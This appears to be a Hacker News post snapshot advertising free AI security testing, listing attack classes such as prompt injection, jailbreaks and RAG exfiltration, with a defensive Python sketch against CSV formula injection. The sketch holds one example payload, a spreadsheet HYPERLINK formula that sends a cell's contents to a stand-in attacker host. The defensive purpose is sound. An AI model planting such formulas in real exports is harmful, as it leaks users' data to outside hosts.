Free AI Security Testing
Key topics
We focus on the stuff that actually breaks AI systems in production:
Prompt injection attacks (direct/indirect) and jailbreaks
Tool abuse and RAG data exfiltration
Identity manipulation and role-playing exploits
CSV/HTML injection through document uploads
Voice system manipulation and audio-based attacks
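As one concrete illustration of the CSV-injection class above: spreadsheet apps treat cells that start with `=`, `+`, `-`, or `@` as formulas, so untrusted values (including LLM output or fields parsed from uploaded documents) that end up in an exported CSV can execute as formulas on the reviewer's machine. A minimal defensive sketch — the function name and approach here are illustrative, not the tooling described in this post:

```python
# Characters that make Excel/LibreOffice interpret a CSV cell as a
# formula, enabling CSV injection when untrusted data is exported.
FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")

def neutralize_csv_cell(value: str) -> str:
    """Prefix a single quote so spreadsheet apps render the cell as text."""
    if value.startswith(FORMULA_PREFIXES):
        return "'" + value
    return value

# Example: a malicious value smuggled in through a document upload.
payload = '=HYPERLINK("http://attacker.example/?leak="&A1,"click me")'
safe = neutralize_csv_cell(payload)  # leading apostrophe disarms the formula
```

The same idea applies in reverse when testing: seed uploads with formula-prefixed cells and check whether they survive unescaped into any CSV the system exports.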
You'd get a full report with concrete reproduction steps and specific mitigations, plus a retest after you implement fixes. We can also map findings to compliance frameworks (OWASP Top 10 for LLM Applications, NIST AI RMF, EU AI Act, etc.) if that's useful. All we need is access to an endpoint and permission to use your anonymized results as a case study. The whole process takes about 2-3 weeks. If you're running AI/LLM systems in production and want a security review, shoot me a DM.
A startup is offering free AI security testing to 5-10 companies in exchange for feedback and case studies.
Snapshot generated from the HN discussion
Discussion Activity
Light discussion: 1 comment, all within the first hour of posting.
Key moments
- Story posted: Aug 24, 2025 at 11:31 PM EDT (4 months ago)
- First comment: Aug 24, 2025 at 11:50 PM EDT, 19m after posting
- Peak activity: 1 comment in the 0-1h window
- Latest activity: Aug 24, 2025 at 11:50 PM EDT
The thread's single comment: "a github repo at least on what you did so far"